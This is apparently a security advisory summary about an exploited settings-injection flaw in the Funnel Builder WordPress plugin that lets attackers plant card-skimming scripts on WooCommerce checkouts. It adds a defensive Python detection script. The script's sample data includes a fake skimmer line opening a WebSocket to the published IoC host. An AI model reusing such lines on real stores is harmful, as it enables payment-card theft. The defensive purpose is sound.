Full Report
A critical security vulnerability impacting the Funnel Builder plugin for WordPress has come under active exploitation in the wild to inject malicious JavaScript code into WooCommerce checkout pages with the goal of stealing payment data. Details of the activity were published by Sansec this week. The vulnerability currently does not have an official CVE identifier. It
Analysis Summary
# Vulnerability: Unauthenticated Settings Injection in Funnel Builder for WordPress
## CVE Details
- **CVE ID:** None assigned (as of report date)
- **CVSS Score:** N/A (Described as Critical)
- **CWE:** CWE-284 (Improper Access Control) / CWE-94 (Improper Control of Generation of Code, "Code Injection")
## Affected Systems
- **Products:** Funnel Builder plugin (by FunnelKit) for WordPress
- **Versions:** All versions prior to 3.15.0.3
- **Configurations:** WordPress installations using the Funnel Builder plugin in conjunction with WooCommerce.
## Vulnerability Description
The Funnel Builder plugin contains a publicly exposed checkout endpoint that allows unauthenticated callers to invoke internal methods. Due to a lack of permission checks or method white-listing, an attacker can trigger an internal method that writes data directly to the plugin’s "External Scripts" global setting. This allows an attacker to persist arbitrary JavaScript into the e-commerce store's checkout pages.
## Exploitation
- **Status:** Exploited in the wild (Magecart-style attack)
- **Complexity:** Low
- **Attack Vector:** Network (Remote/Unauthenticated)
## Impact
- **Confidentiality:** High (Theft of full payment card data, CVVs, and PII)
- **Integrity:** High (Unauthorized modification of site settings and injection of foreign code)
- **Availability:** Low
## Remediation
### Patches
- **Update to Version 3.15.0.3 or higher:** FunnelKit has released this version specifically to address the permission checks and close the exploit vector.
### Workarounds
- **Manual Cleanup:** If an update cannot be performed immediately, site administrators should manually inspect the plugin's **Settings > Checkout > External Scripts** setting and remove any script they did not add themselves.
- **Path Restriction:** Restrict access to plugin-specific endpoints via a Web Application Firewall (WAF) to prevent unauthenticated interactions with sensitive plugin internals.
## Detection
- **Indicators of Compromise (IoCs):**
  - Presence of unfamiliar scripts in **Settings > Checkout > External Scripts**.
  - Payloads masquerading as Google Tag Manager (GTM) or Google Analytics.
  - Known malicious domain/socket: `wss://protect-wss[.]com/ws`.
- **Detection Methods:**
  - Deployment of File Integrity Monitoring (FIM) or specialized e-commerce security scanners (e.g., Sansec).
  - Reviewing web logs for unusual POST requests to Funnel Builder checkout endpoints originating from unknown IPs.
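The two detection methods above can be turned into repeatable checks. The following Python script is an added example written for this page; it is not code from the advisory, from Sansec or from FunnelKit. `audit_external_scripts()` scans the text of the "External Scripts" setting for script or WebSocket sources whose host is not on an allowlist, reports the published IoC host by name, and marks a block as masquerading when a Google Tag Manager / Analytics label is wrapped around a foreign host. `suspicious_checkout_posts()` scans combined-format access-log lines for POSTs to the checkout endpoint from IPs outside a known-good set and notes whether the Referer is off-site. The endpoint path, the allowlist contents, the sample setting text and the log lines are all constructed placeholders; the advisory does not name the endpoint, so the real path must be substituted for the install being checked.

```python
# Added example, not from the advisory or the plugin vendor.
import re
from urllib.parse import urlparse

# Hosts a genuine GTM / Analytics tag loads from (assumption: extend this set
# with the store's own first-party script hosts before running it for real).
GOOGLE_HOSTS = frozenset({
    "www.googletagmanager.com", "googletagmanager.com",
    "www.google-analytics.com", "analytics.google.com",
})
# IoC host from the advisory, kept defanged in the source and refanged at runtime.
IOC_HOST = "protect-wss[.]com".replace("[.]", ".")

# Absolute or protocol-relative http(s)/ws(s) URLs inside the setting text.
URL_RE = re.compile(r"(?:(?:https?|wss?):)?//[^\s\"'<>]+", re.I)
# Words a payload uses to pass itself off as Google tooling.
GOOGLE_WORDS_RE = re.compile(r"\bgtm\b|google\s*tag\s*manager|google-?analytics|\bgtag\b", re.I)


def audit_external_scripts(setting_html, allowed_hosts=GOOGLE_HOSTS):
    """Return one finding per script/WebSocket source whose host is not allow-listed.
    Each <script> block is examined together with the comment/text preceding it, so
    a 'Google Tag Manager' label wrapped around a foreign host is reported as masquerading."""
    findings = []
    for block in re.split(r"(?<=</script>)", setting_html, flags=re.I):
        google_like = bool(GOOGLE_WORDS_RE.search(block))
        for m in URL_RE.finditer(block):
            url = m.group(0)
            host = (urlparse(url).hostname or "").lower().rstrip(".")
            if not host or host in allowed_hosts:
                continue
            reasons = ["known IoC host" if host == IOC_HOST else "host not on allowlist"]
            if google_like:
                reasons.append("masquerades as Google Tag Manager/Analytics")
            findings.append({"url": url, "host": host, "reasons": reasons})
    return findings


# Combined log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# PLACEHOLDER: the advisory does not name the endpoint; substitute the real
# Funnel Builder checkout endpoint path for the install being audited.
CHECKOUT_ENDPOINT_RE = re.compile(r"^/PLACEHOLDER-funnel-builder-checkout-endpoint(?:[/?]|$)")


def suspicious_checkout_posts(log_lines, site_host, known_ips=frozenset()):
    """Return POSTs to the checkout endpoint from IPs outside known_ips. Each hit
    records whether the Referer is off-site or absent: a real shopper posts from
    the store's own checkout page, a direct injection attempt usually does not."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not CHECKOUT_ENDPOINT_RE.search(m["path"]):
            continue
        if m["ip"] in known_ips:
            continue
        ref_host = urlparse(m["referer"]).hostname
        hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                     "ua": m["ua"], "offsite_referer": ref_host != site_host})
    return hits


# Constructed sample data: a fake External Scripts setting and fake log lines.
SAMPLE_SETTING = (
    '\n<!-- Google Tag Manager -->\n'
    '<script async src="https://www.googletagmanager.com/gtag/js?id=GTM-EXAMPLE"></script>\n'
    '<!-- Google Tag Manager (loader) -->\n'
    '<script>var gtm_ws = new WebSocket("wss://' + IOC_HOST + '/ws");</script>\n'
    '<script src="https://gtm-cdn.example-bad.test/gtm.js"></script>\n'
    '<script src="https://cdn.example-shop.test/js/checkout-ui.js"></script>\n'
)
SAMPLE_LOG = """\
203.0.113.7 - - [03/May/2026:10:14:02 +0000] "POST /PLACEHOLDER-funnel-builder-checkout-endpoint HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.20 - - [03/May/2026:10:15:40 +0000] "GET /checkout/ HTTP/1.1" 200 30211 "-" "Mozilla/5.0"
198.51.100.20 - - [03/May/2026:10:16:01 +0000] "POST /PLACEHOLDER-funnel-builder-checkout-endpoint HTTP/1.1" 200 88 "https://shop.example.test/checkout/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    # The store's own CDN is first-party, so it joins the allowlist.
    for f in audit_external_scripts(SAMPLE_SETTING, GOOGLE_HOSTS | {"cdn.example-shop.test"}):
        print("SCRIPT FINDING:", f)
    for h in suspicious_checkout_posts(SAMPLE_LOG.splitlines(), "shop.example.test"):
        print("LOG FINDING:", h)
```

Run against a dump of the real setting value and the site's access logs, the script reports the IoC socket and the fake "GTM" loader while the genuine Google tag and the store's own CDN pass; the log check surfaces the scripted POST with no Referer first, and the `known_ips` parameter lets an operator suppress addresses already triaged as legitimate.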
## References
- hxxps[://]thehackernews[.]com/2026/05/funnel-builder-flaw-under-active.html
- hxxps[://]sansec[.]io/research/funnelkit-woocommerce-vulnerability-exploited
- hxxps[://]wordpress[.]org/plugins/funnel-builder/